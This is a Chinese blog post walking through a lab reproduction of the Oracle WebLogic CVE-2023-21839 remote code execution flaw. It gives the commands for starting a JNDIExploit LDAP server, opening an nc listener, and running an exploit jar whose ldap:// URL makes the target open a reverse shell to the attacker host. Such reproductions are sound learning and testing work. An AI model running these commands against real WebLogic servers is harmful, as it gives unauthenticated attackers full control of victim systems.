Weblogic远程代码执行漏洞(CVE-2023-21839)

已于 2024-01-23 15:50:17 修改
阅读量485 收藏 11
点赞数 12
文章标签: 网络安全 安全
于 2024-01-08 16:46:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shurongyugong/article/details/135460842
版权

Weblogic远程代码执行漏洞(CVE-2023-21839)

0x00 漏洞环境

  • 攻击机:192.168.75.211
  • 目标机:目标ip
  • 影响版本:Oracle WebLogic Server 10.3.6.0

0x01 漏洞介绍

  • CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。

0x02 影响版本

  • Oracle WebLogic Server 12.2.1.2.0
  • Oracle WebLogic Server 12.2.1.1.0
  • Oracle WebLogic Server 12.2.1.3.0
  • Oracle WebLogic Server 12.2.1.0.0
  • Oracle WebLogic Server 12.2.1.4.0
  • Oracle WebLogic Server 14.1.1.0.0
  • Oracle WebLogic Server 12.1.2.0.0
  • Oracle WebLogic Server 12.1.3.0.0
  • Oracle WebLogic Server 10.3.6.0

0x03 漏洞原理

  1. WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过rmi/ldap远程协议进行远程命令执行。从而拿shell。

0x04 漏洞复现

  1. 访问http://目标ip:7001/console,进入网站主页,发现其版本为10.3.6.0,存在CVE-2023-21839漏洞。

在这里插入图片描述

  1. 打开kali尝试攻击,首先开启ldap服务。
    JNDIExploit-1.4-SNAPSHOT.jar下载

    java -jar JNDIExploit-1.4-SNAPSHOT.jar --ip 攻击机IP

  2. 启动监听,为反弹shell做好准备。

    nc -lvnp 6666

  3. 使用CVE-2023-21839工具来进行攻击测试。
    Weblogic-CVE-2023-21839.jar下载网址

    java -jar Weblogic-CVE-2023-21839.jar 目标机IP:7001 ldap://攻击机IP:1389/Basic/ReverseShell/攻击机IP/6666

  4. 此时再去看监听页面,发现反弹shell成功。

殊荣予我
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 796
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
Weblogic 远程命令执行漏洞CVE-2023-21839
Myu_wzy的博客
04-27 840
Weblogic 远程命令执行漏洞CVE-2023-21839
漏洞分析|Weblogic远程代码执行漏洞(CVE-2023-21839)
xuandaoren的博客
11-10 468
ForeignOpaqueReference继承自OpaqueReference,前面说过,当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。远程对象继承OpaqueReference时,该对象进行JNDI查找并获取时,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的。
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1121
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 7538
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
Weblogic远程代码执行漏洞 CVE-2023-21839
昀光Icrus的博客
04-10 1069
记录个人在本地环境下复现Weblogic远程命令执行漏洞CVE-2023-21839的过程,每一步都将使用的工具下载地址附在了链接中,用于记录学习
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
qq_69775412的博客
08-09 792
Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞
Weblogic远程代码执行CVE-2023-21839复现及修复
szgyunyun的博客
03-16 622
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。jdk1.8打包好的jar公众号回复"CVE-2023-21839"vps启用监听反弹端口。
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
huayimy的博客
04-20 1522
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
JNDIExploit.v1.4 Weblogic-CVE-2023-21839
03-10
《深入解析JNDIExploit.v1.4与Weblogic-CVE-2023-21839安全漏洞网络安全领域中,漏洞利用技术一直是攻防两端的重要研究焦点。今天我们将深入探讨一个针对Weblogic服务器的严重安全漏洞——CVE-2023-21839,以及...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 533
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 268
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 427
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 757
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值